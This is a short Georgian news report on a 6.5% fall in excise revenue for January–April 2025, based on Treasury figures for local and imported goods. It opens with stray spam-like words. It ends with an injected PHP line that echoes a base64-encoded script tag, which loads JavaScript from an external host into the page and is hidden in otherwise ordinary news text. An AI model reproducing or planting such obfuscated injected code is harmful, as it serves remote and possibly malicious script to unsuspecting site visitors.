gorgia
jaluzi

ბიუჯეტს აქციზიდან მიღებული შემოსავალი 48.453 მლნ ლარით, დაახლოებით 6.5%-ით შეუმცირდა - ამაზე მიუთითებს ხაზინის მონაცემები საქართველოს ნაერთი ბიუჯეტის შემოსულობები (კონსოლიდაციის გარეშე) შესახებ.

უფრო კონკრეტულად, 2025 წლის იანვარ-აპრილში ხაზინაში აქციზიდან 699 459 604 ლარი შევიდა, წინა წლის ანალოგიურ პერიოდში კი ამ მუხლიდან ბიუჯეტმა 747 912 999 ლარის შემოსავალი მიიღო.

განსაკუთრებული კლება ადგილობრივი წარმოების პროდუქციის რეალიზაციიდან მიღებულ შემოსავალს შეეხო. კერძოდ, თუ შარშან ბიუჯეტმა ამ მუხლიდან 55 818 142 ლარის შემოსავალი მიიღო, წელს მაჩვენებელმა 18 005 777 ლარი შეადგინა. ანუ კლება 37.812 მლნ ლარია.

ამასთან, ამავე მონაცემებით, 10.641 მლნ ლარით შემცირდა ხაზინაში იმპორტირებული პროდუქციის აქციზიდან შემოსავალი. უფრო კონკრეტულად, 2024 წლის ოთხ თვეში ბიუჯეტში იმპორტირებული პროდუქციის აქციზიდან 692 094 856 ლარი შევიდა, წელს კი 681 453 826 ლარი.

122
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");